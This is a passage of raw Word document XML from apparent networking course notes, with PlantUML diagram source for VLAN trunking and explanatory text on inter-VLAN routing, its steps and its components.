          <w:p w14:paraId="261C0ED9" w14:textId="77777777" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0052487A">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>frame1 --&gt; trunk_b : VLAN 10 Tagged Frame</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1D7272BA" w14:textId="77777777" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0052487A">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>frame2 --&gt; trunk_b : VLAN 20 Tagged Frame</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4AA7FF85" w14:textId="77777777" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0052487A">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>frame3 --&gt; trunk_b : VLAN 30 Tagged Frame</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2A0262C4" w14:textId="77777777" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3893BDB0" w14:textId="77777777" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0052487A">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>trunk_b --&gt; vlan10_b : Remove VLAN 10 Tag</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="16E0E387" w14:textId="77777777" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0052487A">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>trunk_b --&gt; vlan20_b : Remove VLAN 20 Tag</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4C857CAC" w14:textId="77777777" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0052487A">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>trunk_b --&gt; vlan30_b : Remove VLAN 30 Tag</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="380CA907" w14:textId="77777777" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="58BD4383" w14:textId="77777777" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0052487A">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>vlan10_b --&gt; port1_b</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6FD3EDDA" w14:textId="77777777" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0052487A">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>vlan20_b --&gt; port2_b</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3058A84D" w14:textId="77777777" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0052487A">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>vlan30_b --&gt; port3_b</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="543D5F39" w14:textId="77777777" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="517AF1F6" w14:textId="77777777" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0052487A">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>port1_b --&gt; pc1_b : Untagged Frame</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="74A1458D" w14:textId="77777777" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0052487A">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>port2_b --&gt; pc2_b : Untagged Frame</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="69F63498" w14:textId="77777777" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0052487A">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>port3_b --&gt; pc3_b : Untagged Frame</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="254CAD85" w14:textId="77777777" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="09A99C4A" w14:textId="77777777" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0052487A">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>note top of trunk_link : Single physical link\ncarries multiple VLANs</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4ADD759C" w14:textId="77777777" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0052487A">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>note right of tagged_frames : Each frame tagged\nwith VLAN ID</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2CF5BA63" w14:textId="77777777" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0052487A">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>note bottom of devices_a : End devices receive\nuntagged frames</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="69FC4433" w14:textId="77777777" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0052487A">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>note bottom of devices_b : Same VLAN, different switch\ncommunicate seamlessly</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="063C3EDD" w14:textId="0DD1495F" w:rsidR="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0052487A">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>@enduml</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0052487A" w14:paraId="2B4B523D" w14:textId="77777777" w:rsidTr="0052487A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="17042" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="039EB7AB" w14:textId="06B3CAF1" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
            <w:pPr>
              <w:spacing w:before="120" w:after="120" w:line="22" w:lineRule="atLeast"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0052487A">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Real-</w:t>
            </w:r>
            <w:r w:rsidRPr="0052487A">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>world application</w:t>
            </w:r>
            <w:r w:rsidRPr="0052487A">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7AF8D5DD" w14:textId="77777777" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="249"/>
              </w:numPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0052487A">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Sales PCs on both switches can communicate (same VLAN 10)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="373168B6" w14:textId="77777777" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="249"/>
              </w:numPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0052487A">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Engineering devices isolated from Sales (different VLANs)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7D8AD778" w14:textId="77777777" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="249"/>
              </w:numPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0052487A">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Single trunk link reduces cabling requirements</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="390734DC" w14:textId="76E8109E" w:rsidR="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="249"/>
              </w:numPr>
            </w:pPr>
            <w:r w:rsidRPr="0052487A">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Easy to add new VLANs without additional physical connections</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="454" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6483B1DD" w14:textId="77777777" w:rsidR="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0718F25E" w14:textId="77777777" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="0052487A">
        <w:t>Inter-VLAN Routing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6316C681" w14:textId="77777777" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r w:rsidRPr="0052487A">
        <w:t>Definition</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BCA3234" w14:textId="77777777" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
      <w:r w:rsidRPr="0052487A">
        <w:t>Inter-VLAN routing is the process of forwarding traffic between different VLANs using Layer 3 routing functionality. Since VLANs create separate broadcast domains that cannot communicate directly at Layer 2, a Layer 3 device (router or Layer 3 switch) is required to route packets between VLANs, enabling controlled communication while maintaining network segmentation benefits.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16F4F1F3" w14:textId="77777777" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r w:rsidRPr="0052487A">
        <w:t>How It Works</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DF2B0E6" w14:textId="77777777" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
      <w:r w:rsidRPr="0052487A">
        <w:t>Inter-VLAN routing operates through Layer 3 packet forwarding between VLAN subnets:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7279352D" w14:textId="77777777" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
      <w:r w:rsidRPr="0052487A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Routing Process:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EFA0672" w14:textId="77777777" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="256"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0052487A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Source Device</w:t>
      </w:r>
      <w:r w:rsidRPr="0052487A">
        <w:t>: Sends packet to default gateway</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48D60A12" w14:textId="77777777" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="256"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0052487A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>VLAN Interface</w:t>
      </w:r>
      <w:r w:rsidRPr="0052487A">
        <w:t>: Router/switch receives packet on VLAN interface</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="564D3964" w14:textId="77777777" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="256"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0052487A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Routing Decision</w:t>
      </w:r>
      <w:r w:rsidRPr="0052487A">
        <w:t>: Routing table lookup for destination network</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B9F9DE6" w14:textId="77777777" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="256"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0052487A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Packet Forwarding</w:t>
      </w:r>
      <w:r w:rsidRPr="0052487A">
        <w:t>: Route packet to destination VLAN interface</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="657961F6" w14:textId="77777777" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="256"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0052487A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Destination Delivery</w:t>
      </w:r>
      <w:r w:rsidRPr="0052487A">
        <w:t>: Forward packet to destination device</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CAFF94C" w14:textId="77777777" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="256"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0052487A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Return Path</w:t>
      </w:r>
      <w:r w:rsidRPr="0052487A">
        <w:t>: Same process for return traffic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05FBDE23" w14:textId="1DCF7FCF" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
      <w:r w:rsidRPr="0052487A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Required </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r w:rsidRPr="0052487A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>omponents:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A858C34" w14:textId="77777777" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="258"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0052487A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Layer 3 Device</w:t>
      </w:r>
      <w:r w:rsidRPr="0052487A">
        <w:t>: Router or Layer 3 switch with routing capability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6060762A" w14:textId="77777777" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="258"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0052487A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>VLAN Interfaces</w:t>
      </w:r>
      <w:r w:rsidRPr="0052487A">
        <w:t>: Logical interfaces for each VLAN (SVIs or subinterfaces)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FA209D6" w14:textId="77777777" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="258"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0052487A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>IP Addressing</w:t>
      </w:r>
      <w:r w:rsidRPr="0052487A">
        <w:t>: Unique subnet for each VLAN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36605C1E" w14:textId="77777777" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="258"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0052487A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Routing Configuration</w:t>
      </w:r>
      <w:r w:rsidRPr="0052487A">
        <w:t>: Static routes or dynamic routing protocols</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29BAAAAA" w14:textId="77777777" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="258"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0052487A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Default Gateways</w:t>
      </w:r>
      <w:r w:rsidRPr="0052487A">
        <w:t>: Each VLAN device points to router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8"/>
        <w:gridCol w:w="1228"/>
      </w:tblGrid>
      <w:tr w:rsidR="0052487A" w14:paraId="69511624" w14:textId="77777777" w:rsidTr="00635069">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="16268" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="11B1D621" w14:textId="1E254674" w:rsidR="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2426DBA8" wp14:editId="021794D2">
                  <wp:extent cx="10193573" cy="6943192"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="1198011938"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2675" cy="6956203"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1228" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="629E2A50" w14:textId="77777777" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
            <w:pPr>
              <w:spacing w:before="120" w:after="120" w:line="22" w:lineRule="atLeast"/>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0052487A">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>@startuml Inter_VLAN_Routing</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="68CA250A" w14:textId="77777777" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
            <w:pPr>
              <w:spacing w:before="120" w:after="120" w:line="22" w:lineRule="atLeast"/>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2DFBD2A4" w14:textId="77777777" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
            <w:pPr>
              <w:spacing w:before="120" w:after="120" w:line="22" w:lineRule="atLeast"/>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0052487A">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>title Inter-VLAN Routing Architecture</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="30CCA789" w14:textId="77777777" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
            <w:pPr>
              <w:spacing w:before="120" w:after="120" w:line="22" w:lineRule="atLeast"/>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3643F0F6" w14:textId="77777777" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
            <w:pPr>
              <w:spacing w:before="120" w:after="120" w:line="22" w:lineRule="atLeast"/>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0052487A">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>package "Layer 2 Switch" as l2_switch {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="677FDE10" w14:textId="77777777" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
            <w:pPr>
              <w:spacing w:before="120" w:after="120" w:line="22" w:lineRule="atLeast"/>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0052487A">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  rectangle "VLAN 10\nSales\n192.168.10.0/24" as vlan10 #lightgreen</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F76FDB4" w14:textId="77777777" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
            <w:pPr>
              <w:spacing w:before="120" w:after="120" w:line="22" w:lineRule="atLeast"/>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0052487A">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  rectangle "VLAN 20\nEngineering\n192.168.20.0/24" as vlan20 #lightyellow</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="02EFBFD5" w14:textId="77777777" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
            <w:pPr>
              <w:spacing w:before="120" w:after="120" w:line="22" w:lineRule="atLeast"/>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
